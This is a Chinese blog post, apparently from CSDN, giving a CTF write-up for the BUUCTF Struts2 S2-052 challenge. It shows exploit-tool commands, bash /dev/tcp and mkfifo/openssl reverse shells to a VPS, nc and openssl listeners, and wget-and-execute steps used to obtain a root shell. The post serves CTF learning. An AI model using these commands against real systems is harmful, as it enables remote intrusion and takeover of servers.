BUUCTF笔记之Real部分WP([struts2]s2-052)

最新推荐文章于 2024-05-28 15:25:07 发布
最新推荐文章于 2024-05-28 15:25:07 发布
阅读量730 收藏
点赞数 4
分类专栏: web安全 CTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/114402451
版权

声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!

这题有点小坑,值得单独写一篇文章分析它的坑。

参考资料:1、反弹shell受限情况下的倔强

2、全程带阻:记一次授权网络攻防演练(下)

先上flag:

启动环境之后是这样。

根据vulhub的提示,我们直接拿到存在漏洞的url:

http://node3.buuoj.cn:25069/orders/3/edit

经过本地burp测试也复现了该漏洞,但BUUCTF上的环境是不会有回显的,这就给渗透带来了很大的麻烦。

为了节省时间,直接上工具了。

经过工具测试确认漏洞存在:

坑1

因为漏洞没有回显,需要上传一个一句话,这是第一个坑。

我们通过工具向服务器写入一个jsp的一句话:

失败了,换一个,上传一个jspx的一句话,也失败了:

坑2

既然带回显的一句话上传失败,那就通过漏洞反弹shell试试:

注:反弹shell需要一个有公网IP的vps。我随便买了一个。

反弹shell的命令:

python apache-struts-pwn.py --exploit -u http://node3.buuoj.cn:25869/orders/4/edit -c 'bash -i >& /dev/tcp/你的vps的公网IP/VPS监听的端口 0>&1'

我在VPS上监听8080端口,我的VPS的公网IP为:1.1.1.1

所以命令为:python apache-struts-pwn.py --exploit -u http://node3.buuoj.cn:25869/orders/4/edit -c 'bash -i >& /dev/tcp/1.1.1.1/8080 0>&1'

在VPS上监听8080端口:nc -lvvp 8080:

通过工具反弹一个shell回来:

如上图,又失败了。。。。监听了半天啥也没有。

走到这里要好好考虑下到底是怎么回事。

当反弹shell失败的时候,我们要考虑下到底是为什么失败,根据可能的原因逐一排查。

1、检查目标是否通外网(这一步一般是用在打内网的时候。当然,在BUUCTF这道题里面肯定是通的)

我们在dnslog上随便申请一个域名:

通过工具使目标ping一下该域名,看看成不成功:

刷新一下dnslog的记录,发现有记录:

说明机器允许外网流量。

2、检查bash命令是否存在,但这一步因为没有回显,一句话也写不进去,暂时想不到排查的办法。

3、检查是否是出站端口受限:

在vps监听8080端口。

然后通过工具执行wget http://你的vps的ip地址:监听的端口

8080端口收到了请求:

再试一个随机端口12345,也成功了,说明出站的端口没有受限:

4、目标机器存在流量审查机制

我们在假设bash命令可用的情况下,排除是否存在流量审查机制。

vps上生成证书的公私钥对:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

要输入的地方一路回车。

在vps上使用openssl监听接收shell的端口:

openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

用工具执行openssl加密反弹shell的流量:

失败了,换成443端口试试:

还是失败了。

坑3

在这里我卡了很久,最后发现是工具传过去的命令可能有问题导致的,如此我们换一种方式执行命令。

在vps上生成一个执行openssl的.sh脚本:(这里已经测试过目标机器上可以通过漏洞利用工具执行sh脚本,原理也是在sh脚本内写一个Ping域名的命令查看是否有记录来判断是否成功)

#!/bin/sh
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 1.1.1.1:443 > /tmp/s; rm /tmp/s

上面的ip就是vps的IP,这个公网IP是我买的按时长计费的一小时vps,所以IP可以放出来,反正马上就过时了:)

然后我们在sh文件所在的目录下执行以下python2命令:

python -m SimpleHTTPServer 8080

通过漏洞利用工具执行以下命令:

 python apache-struts-pwn.py --exploit -u http://node3.buuoj.cn:27539/orders/4/edit -c 'wget http://116.85.29.47:8080/1.sh'

vps上也收到了目标机器的请求,说明sh文件已经成功下载到了目标机上:

然后我们ctrl c 关掉python快速搭建的文件服务器,重新打开openssl监听443端口加密流量。

然后通过漏洞利用工具将目标机器上的sh文件改成777:

 python apache-struts-pwn.py --exploit -u http://node3.buuoj.cn:27539/orders/4/edit -c 'chmod 777 1.sh'

然后执行该sh文件:

成功获取了一个哑shell:

权限还很高,是个root。

直接执行env就可以拿到flag了。

最后放一个flag判断成功的截图:

-------------------------end-------------------------------------

KogRow(接毕设和大作业版)
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ChatGPT和GPT-4带你选笔记本电脑
herosunly的博客
04-11 14万+
本文介绍核心内容为用好ChatGPT之准确分配角色,希望对学习和使用ChatGPT的同学们有所帮助。为了兼顾质量和速度,本专栏的更新频率为一周一到两更。 文章目录 1. 前言 2. 使用ChatGPT给出选择建议 3. 使用GPT-4给出选择建议
Web框架漏洞--Struts2 漏洞S2-052
qq_54713392的博客
05-08 871
Web框架漏洞–Struts2 漏洞S2-052 漏洞利用: Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)使用vulhub靶场,进入到s2-052
[struts2]s2-052 BUUCTF
krysyal的博客
03-29 3712
[struts2]s2-052 BUUCTF 参考文档 本地检测 python struts-pwn.py --url "http://node4.buuoj.cn:29619/orders/3/edit" vps 使用openssl生成生成证书的公私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 在自己的vps上创建一个openssl反弹会话的脚本 mkfifo /tmp/s; /b
BUUCTF REAL
A_dmin的博客
01-30 4329
BUUCTF REAL flag好像都在系统环境变量中,phpinfo中就能看见,,,, [PHP]XXE libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 payload: <?xml version="1.0" encoding="utf-...
BUUCTF笔记Real部分WP(二)
克格莫(有需要的私信)
06-04 702
很久没有打Real部分了,今天续上 1.[struts2]s2-048
BUUCTF-Real
weixin_43821278的博客
03-08 4937
BUUCTF-Real
struts2漏洞S2-021
ymy131931的博客
05-08 2000
前段时间这个漏洞吵得比较火,最近研究了一下tomcat底层代码,结合struts2的框架源码跟踪了一下这个漏洞的触发过程。在整个debug过程中,感触颇多,遂留下此文以作三思笔记,不敢奢望太多,只希望对感兴趣的童鞋有所帮助,大牛飘过。如果文中哪里有不准确之处,还望各位积极拍砖指正。 0x00 老漏洞新玩法 关于利用,不得不先说一下S2-020这个漏洞,其实之前网上已经有相关文档讲述S...
docker—vulhub—struts2漏洞复现详细过程(s2-001/007/008)
AmyBaby00的博客
11-14 2986
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 简介&准备: 1、centos7 已开启docker :systemctl restart docker.service 2、进入vulhub —struts2 : cd vulhub/struts2 3、启用测试环境:docker-compose up -d 4、PC...
struts2 s2-045漏洞拿站记录
幻的博客
03-11 6000
浏览FreeBuf时发现的文章,新出的漏洞: http://www.freebuf.com/vuls/128668.html 漏洞一出,各位大神早就写出POC: http://www.reg008.com/forum/forum.php?mod=viewthread&tid=9&extra= 接下来就是寻找有漏洞的网站了,这是个麻烦事。 不过有个网站可以拿来干这事: h
buuctf-Real-[ThinkPHP]5-Rce
weixin_46079186的博客
05-09 561
题目地址 是ThinkPHP v5这么有名的漏洞,直接网上找poc 找到poc 复制粘贴一下 可以执行phpinfo ,尝试执行以下其他命令 找了一会没找到,直接写了一个shell 进去找,linux shell脚本原因会过滤$_POST,所以要加\转义 使用蚁剑连接 找了半天,flag就在phpinfo里面。。。。。 ...
BUUCTF-Real-[Flask]SSTI
分享
02-02 1224
服务端模板注入SSTI,可进行代码执行操作!
BUUCTF-Real-[Jupyter]notebook-rce
分享
02-13 758
[Jupyter]notebook的简单漏洞!
buuCTF Real [php]XXE超简单教程
最新发布
wwwyydshen的博客
05-28 184
在做这个题的时候我习惯性的查看了一下上面的链接结果进入了Github中并且我还抓耳挠腮的找了好久的文件,结果呢毫无头绪,今天做了一道题后我突然有了个想法并且进行了尝试,果然还是运气好找到了解题的方法,并且这个方法特别简单(有点让我觉得之前的抓耳挠腮的样子有点可笑)哈哈哈废话不多说,上解题方式!我们看见上面有个链接,所以会下意识的点击那个链接(我觉得这个链接有点混淆视听了,搞不懂里面到底要找什么,所以这里我没有多做研究,但也研究了好久嘿嘿过程就不说了)进入后你会发现有一个php的文件页面。
BUUCTF:[BJDCTF 2nd]Real_EasyBaBa
末初的CSDN博客
10-05 580
题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]Real_EasyBaBa 题目如下 binwalk分析 010 Editor打开 这里已经发现flag了,不过这张图片有隐藏zip的痕迹,接着看下吧 修改一下这里的zip头 50 4B 03 04 14 00 00 00 将50 4B 03 04到结尾选中右键保存选择为zip 解压得到hint
BUUCTF笔记Real部分WP(一)
克格莫(有需要的私信)
02-15 2143
发起一个请求,抓包: 将其修改为POST请求: 然后放进repeater,假加入payload: 写入了一个显示phpinfo的文件,实际操作可以写入一句话。 然后访问这个php: 拿到flag:
BUUCTF复现记录1
baochigu0818的博客
08-20 964
平台地址:https://buuoj.cn/ 里面很多之前的题目,不错的平台。另外幕后大哥博客https://www.zhaoj.in/ 以下的解题,都是参考各位大佬的WP去复现,重在记录下解题思路 以及了解一些常规姿势。 [CISCN2019 华北赛区 Day2 Web1]Hack World 题目是这样的 已经知道了表名和,列名,只需要想办法读取里面的内容...
buuctf/re/近日总结/rome,pyre等(详细解释)
weixin_51681694的博客
10-08 1173
buuctf
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3816
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
Struts2学习笔记:从WebWork到Struts2的转变解析
作者Unmi在笔记中指出,尽管Struts2在名称上与Struts1有关联,但在技术实现上,Struts2实际上基于WebWork,这导致了两者之间存在显著差异,原有的Struts1经验对理解Struts2帮助不大。 1. **框架结构变化**:Struts2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值